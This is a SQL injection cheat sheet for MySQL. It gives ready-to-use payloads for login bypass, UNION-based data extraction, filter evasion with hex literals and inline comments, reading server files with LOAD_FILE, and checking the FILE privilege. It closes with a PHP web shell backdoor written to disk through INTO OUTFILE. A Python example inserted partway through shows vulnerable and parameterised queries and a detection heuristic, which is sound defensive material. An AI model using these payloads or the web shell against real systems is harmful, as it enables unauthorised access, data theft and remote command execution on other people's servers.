SQL Injection Cheat Sheet
Get MySQL version
SELECT @@version
Using -- comments out the rest of the query
Line comments are generally useful for ignoring the rest of the query, so you don't have to fix the syntax of whatever follows the injection point.
DROP sampletable;--
Using hex to bypass magic_quotes and similar filters
You can write hex literals like this:
SELECT 0x457578
There is an easy way to generate the hex representation of a string:
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
Hex based SQL Injection samples:
SELECT LOAD_FILE(0x633A5C626F6F742E696E69);
This will show the contents of c:\boot.ini
Union Injections
With UNION you can run queries across tables. Basically, you can position the query so that it returns records from another table in place of the original result set.
' UNION SELECT 1,2,3 FROM tablename--
Bypassing keyword filters using inline comments:
1 UNI/**/ON SELECT ALL FROM WHERE
Bypassing Login Screens
admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
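The two points above (the login-bypass payloads, and the UNI/**/ON comment trick used against keyword filters) are shown from the defender's side in this added example, which is not part of the original cheat sheet. It uses SQLite in memory instead of MySQL, so the -- payloads apply but the # and /* variants do not; the table, the account and the detection heuristic are all constructed here.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the app's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    conn.execute("INSERT INTO users VALUES ('alice', 'constructed-other')")
    return conn

def login_vulnerable(conn, username, password):
    """Query built by string concatenation: a payload such as admin' --
    closes the quoted string and comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so
    quotes and comment markers inside them are just characters. (Real
    systems compare a password hash here; plaintext keeps the demo short.)"""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Inline comments of the form /* ... */, as used in UNI/**/ON.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

def looks_like_injection(value):
    """Log/WAF triage heuristic (constructed): strip inline comments first
    so UNI/**/ON collapses back to UNION, then flag a UNION keyword, a hex
    literal, or a quote paired with a comment terminator (--, #, /*)."""
    norm = COMMENT_RE.sub("", value).lower()
    has_quote = "'" in norm
    has_terminator = any(t in norm for t in ("--", "#", "/*"))
    return (bool(re.search(r"\bunion\b", norm))
            or bool(re.search(r"\b0x[0-9a-f]+\b", norm))
            or (has_quote and has_terminator))
```

Apostrophes in ordinary input (O'Brien) are not flagged by themselves, which is the point of normalising before matching rather than blocking on a single quote.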
The FILE privilege
Find out which database user we are:
0' UNION SELECT current_user,null /*
or
0' UNION SELECT user(),null /*
Check the FILE privilege:
0' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username'
or
0' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'
Backdoor
$SHELL='<?php echo "Hi Master!";error_reporting(0);ini_set("max_execution_time",0);system($_GET[cmd]);?>';
$SQL="'UNION SELECT 0,0,'".$SHELL."',0 INTO OUTFILE '".$mypath."ipn.php' from admin/*";
$SQL=urlencode($SQL);